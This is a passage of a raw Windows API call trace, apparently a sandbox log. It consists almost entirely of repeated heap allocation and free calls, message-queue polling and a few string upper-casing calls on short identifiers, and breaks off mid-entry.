RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0188.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0188.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0188.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0188.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.574] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0188.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0188.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0188.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0188.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.575] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0188.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0188.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.578] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0188.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0188.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.579] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.579] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0188.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0188.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.579] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.580] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0188.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.580] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.580] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.580] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0188.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0188.581] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0188.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0188.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.581] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.581] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.582] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0188.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.583] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.583] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.583] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0188.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0188.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0188.583] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.584] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0188.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.584] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.584] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.585] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.585] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.586] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.586] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0188.586] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0188.586] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.587] RtlAllocateHeap (HeapHandle=0x25c0000, 